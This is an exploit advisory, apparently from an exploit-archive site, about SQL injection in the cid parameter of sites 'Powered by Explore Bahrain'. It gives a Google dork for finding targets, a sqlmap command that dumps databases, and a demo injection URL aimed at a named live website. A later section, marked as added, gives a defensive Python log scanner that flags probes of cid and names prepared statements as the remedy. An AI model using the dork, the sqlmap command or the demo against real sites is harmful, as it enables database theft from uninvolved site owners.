Explore Bahrain SQL Injection Vulnerability

2016.09.01
1337r00t (SA)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|--------------------------------------------------------------|
|[+] Exploit Title: SQL Injection Vulnerability [ Powered by Explore Bahrain ]
|[+]
|[+] Exploit Author: 1337r00t
|[+]
|[+] Exploit Team Author: T34m D4rkn3ss R00m
|[+]
|[+] Vendor Homepage: www.explorebahrain.com
|[+]
|[+] Google Dork: intext:Powered by Explore Bahrain " inurl:?cid=
|[+]
|[+] Tested on: Mozilla Firefox , SQLMAP
|[+]
|[+] Date: 31/7/2016
|[+]
|--------------------------------------------------------------|
|[+] Exploit :-
|[+]
|[+] http://[$Site].php?cid=[SQL]
|[+]-----------------------------------------------------------|
|[+] p0c :-
|[+]
|[+] Open SQLMAP :-
|[+] ./sqlmap.py -u http://[$Site]products.php?cid=[SQL] --dbs --batch
|[+]
|--------------------------------------------------------------|
|[+] Demo:-
|[+]
|[+] http://www.arepro.bh/products.php?cid=6'
|[+]
|--------------------------------------------------------------|
|[+] My Accounts :-
|[+]
|[+] Twitter:1337r00t
|[+] Instagram: 1337r00t
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+]-------------------------------------------[+]
|[+] G2 : Killer~X - 3NeeDaN HacKeR - Saudi HeX - Lion Hacker - Ev!L r00t - BaRQawI - LaTh3 - BL4ck M4n - Safaa Hacker
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : 1337r00t
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
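For operators of affected sites, the following added example (not part of the original advisory) scans web access logs for requests where the cid parameter is not a plain integer or where the client identifies itself as sqlmap. It assumes Apache/nginx "combined" log format and that cid is normally a numeric ID, as in the advisory's demo value; the function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log format (assumed log layout).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2016:10:00:01 +0300] "GET /products.php?cid=6 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Sep/2016:10:02:13 +0300] "GET /products.php?cid=6%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Sep/2016:10:02:40 +0300] "GET /products.php?cid=6 HTTP/1.1" 200 5120 "-" "sqlmap/1.0 (http://sqlmap.org)"',
    '192.0.2.10 - - [01/Sep/2016:10:03:05 +0300] "GET /index.php?page=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def suspicious_cid_requests(lines, param="cid"):
    """Return (ip, target, status, reasons) for requests that look like injection probes."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        try:
            parts = urlsplit(m["target"])
        except ValueError:
            continue  # malformed request target
        if not parts.path.lower().endswith(".php"):
            continue
        # parse_qs percent-decodes, so %27 is compared as a literal quote.
        values = parse_qs(parts.query, keep_blank_values=True).get(param)
        if values is None:
            continue
        reasons = []
        if any(not re.fullmatch(r"[0-9]{1,10}", v) for v in values):
            reasons.append("non-numeric cid")
        if len(values) > 1:
            reasons.append("repeated cid")
        # Weak signal: the User-Agent is client-controlled and easily changed.
        if "sqlmap" in m["ua"].lower():
            reasons.append("sqlmap user-agent")
        if reasons:
            findings.append((m["ip"], m["target"], int(m["status"]), reasons))
    return findings

if __name__ == "__main__":
    for ip, target, status, reasons in suspicious_cid_requests(SAMPLE_LOG):
        print(ip, status, target, ", ".join(reasons))
```

Hits on this check show probing, not a fix; the underlying remedy for CWE-89 is to bind cid as a typed parameter in a prepared statement.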


Copyright 2024, cxsecurity.com

 
